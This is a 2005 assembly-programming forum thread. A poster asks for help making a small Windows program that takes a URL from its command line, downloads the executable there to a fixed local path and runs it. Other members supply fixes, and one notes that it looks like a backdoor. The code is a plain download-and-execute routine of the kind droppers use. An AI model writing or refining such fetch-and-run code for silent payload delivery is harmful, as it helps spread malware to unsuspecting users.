Hi!
I wrote this code:

-----------------------------------------------
.386
.model flat,stdcall

include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\urlmon.inc
includelib \masm32\lib\urlmon.lib

.data
url byte 'http://chmureczki.republika.pl/test.exe',0
linia byte ?
target byte 'c:\x.exe',0


.code

start:

;------------------------------
; I`m goingo t put prog arg as URL
;but how to do it?
;could you fix it?


call GetCommandLine
mov linia,eax

xor eax,eax
push eax
push offset linia
push eax
push eax
call WinMain

;--- below is OK---------------

push offset target
call DeleteFile

push eax
push eax
push offset target
push offset url
push eax
call UrlDownloadToFile

push eax
push offset target
call WinExec

push eax
call ExitProcess

end start
-------------------------------

I would like to get parametr of this program and put it as URL
as example:

program.exe www.somewhere.com/file.exe

and program will take www.somewhere.com/file.exe form argument and download it and then run
could you fix for me section in which i`m operating on this args  :sad:

best wishes?
Posted on 2005-09-29 03:11:29 by aX3l
another backdoor? :)

try:
      invoke GetCommandLine
      invoke PathGetArgs,eax
Posted on 2005-09-29 03:31:52 by Shoo
no it isn`t for backdoor but I know it look like :D

ok I will try it :)

Best wishes and TNX
Posted on 2005-09-29 03:56:11 by aX3l
ok so now i have something like that

part of code which is important:


.data
url dword ?
target byte 'c:\x.exe',0

.code
start:

call GetCommandLine

push eax
call PathGetArgs
mov url,eax

push offset target
call DeleteFile

push 0h
push 0h
push offset target
push offset url
push 0h
call UrlDownloadToFile



after comp+linking no errors but it doesn`t work :(
what is wrong?

TNX
Posted on 2005-09-29 04:10:47 by aX3l
it could be just quoted: try to unquote. this works:
    invoke GetModuleHandle,0
    mov    ,eax
    invoke GetCommandLine
    invoke PathGetArgs,eax
    invoke PathUnquoteSpaces,eax
    mov ,eax
    invoke MessageBox,0,
,0,0
    invoke URLDownloadToFile,0,
,fname,0,0
    invoke ExitProcess,0

(fasm)
Posted on 2005-09-29 06:20:22 by Shoo
bih TNX Shoo !!!!!!!!!! :)

I have done it in this way. what do you think? And why target program don`t have name of file on serwer?
(It is always saved as "~.exe") :(



;important part of code

.data
url db 128 dup (0)
target byte '~.exe',0


.code

start:

push offset url
push 1
call GetCL

push offset target
call DeleteFile

push 0
push 0
push offset target
push offset url
push 0
call UrlDownloadToFile

;after this run exe and exit

Posted on 2005-09-29 09:13:27 by aX3l
1.i do not know what GetCL is (never used it before)
2.those who develop that function decided it is better: you can extract file name from url and save file with same way, or you can have separate url to folder and filename and combine them at run time - there a lot of variances

regards!
Posted on 2005-09-29 09:24:06 by Shoo
GetCL is part of the masm32 library.
Posted on 2005-09-29 10:51:07 by QvasiModo
...and it should be avoided (buffer overflow exploit):
http://www.old.masmforum.com/viewtopic.php?t=3549
http://www.masmforum.com/simple/index.php?topic=1534.0
Posted on 2005-09-29 10:55:45 by f0dder